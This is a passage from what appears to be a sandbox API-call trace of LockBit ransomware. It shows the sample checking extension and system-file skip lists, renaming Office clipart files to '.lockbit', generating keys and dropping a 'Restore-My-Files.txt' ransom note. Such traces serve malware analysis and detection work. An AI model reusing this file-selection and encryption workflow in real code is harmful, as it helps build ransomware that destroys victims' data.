(lpString1=".hlp", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.330] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NBOOK_01.MID") returned 1 [0165.330] lstrcmpiW (lpString1="ntldr", lpString2="NBOOK_01.MID") returned 1 [0165.330] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NBOOK_01.MID") returned 1 [0165.330] lstrcmpiW (lpString1="bootsect.bak", lpString2="NBOOK_01.MID") returned -1 [0165.330] lstrcmpiW (lpString1="autorun.inf", lpString2="NBOOK_01.MID") returned -1 [0165.330] lstrcmpiW (lpString1="thumbs.db", lpString2="NBOOK_01.MID") returned 1 [0165.330] lstrcmpiW (lpString1="iconcache.db", lpString2="NBOOK_01.MID") returned -1 [0165.331] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.331] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned=".MID" [0165.331] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.331] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.331] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.331] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.331] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.331] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.332] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.332] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.lockbit") returned 72 [0165.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0165.337] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.337] malloc (_Size=0x40068) returned 0x3d70450 [0165.337] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5968) returned 1 [0165.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0165.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0165.338] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0165.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.341] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.341] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.342] free (_Block=0x1fa2ed8) [0165.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.342] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5969b6f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1540, dwReserved0=0x0, dwReserved1=0x0, cFileName="OCEAN_01.MID", cAlternateFileName="")) returned 1 [0165.342] lstrcmpiW (lpString1=".", lpString2="OCEAN_01.MID") returned -1 [0165.342] lstrcmpiW (lpString1="..", lpString2="OCEAN_01.MID") returned -1 [0165.342] PathFindExtensionW (pszPath="OCEAN_01.MID") returned=".MID" [0165.342] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.342] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.342] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.343] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.343] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.344] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.344] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="OCEAN_01.MID") returned 1 [0165.345] lstrcmpiW (lpString1="ntldr", lpString2="OCEAN_01.MID") returned -1 [0165.345] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="OCEAN_01.MID") returned -1 [0165.345] lstrcmpiW (lpString1="bootsect.bak", lpString2="OCEAN_01.MID") returned -1 [0165.345] lstrcmpiW (lpString1="autorun.inf", lpString2="OCEAN_01.MID") returned -1 [0165.345] lstrcmpiW (lpString1="thumbs.db", lpString2="OCEAN_01.MID") returned 1 [0165.345] lstrcmpiW (lpString1="iconcache.db", lpString2="OCEAN_01.MID") returned -1 [0165.345] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned=".MID" [0165.345] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.345] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.345] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.345] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.346] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.346] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.346] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.346] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.346] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.346] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.346] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.lockbit") returned 72 [0165.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0165.351] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.351] malloc (_Size=0x40068) returned 0x3df0008 [0165.351] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5440) returned 1 [0165.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.353] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.355] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.355] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.356] free (_Block=0x1fa2ed8) [0165.356] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.356] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.357] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x19f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTDR_01.MID", cAlternateFileName="")) returned 1 [0165.357] lstrcmpiW (lpString1=".", lpString2="OUTDR_01.MID") returned -1 [0165.357] lstrcmpiW (lpString1="..", lpString2="OUTDR_01.MID") returned -1 [0165.357] PathFindExtensionW (pszPath="OUTDR_01.MID") returned=".MID" [0165.357] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.357] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.357] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.357] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.357] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.357] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.357] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.357] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.358] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.358] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.359] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.359] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.359] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.359] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="OUTDR_01.MID") returned 1 [0165.359] lstrcmpiW (lpString1="ntldr", lpString2="OUTDR_01.MID") returned -1 [0165.359] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="OUTDR_01.MID") returned -1 [0165.359] lstrcmpiW (lpString1="bootsect.bak", lpString2="OUTDR_01.MID") returned -1 [0165.359] lstrcmpiW (lpString1="autorun.inf", lpString2="OUTDR_01.MID") returned -1 [0165.359] lstrcmpiW (lpString1="thumbs.db", lpString2="OUTDR_01.MID") returned 1 [0165.359] lstrcmpiW (lpString1="iconcache.db", lpString2="OUTDR_01.MID") returned -1 [0165.359] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.359] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned=".MID" [0165.359] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.359] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.359] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.360] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.360] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.361] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.361] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.361] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.361] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.lockbit") returned 72 [0165.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.366] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.366] malloc (_Size=0x40068) returned 0x1ff1e60 [0165.366] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6644) returned 1 [0165.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0165.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0165.367] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.376] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.376] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.378] free (_Block=0x1fa2ed8) [0165.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.378] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: 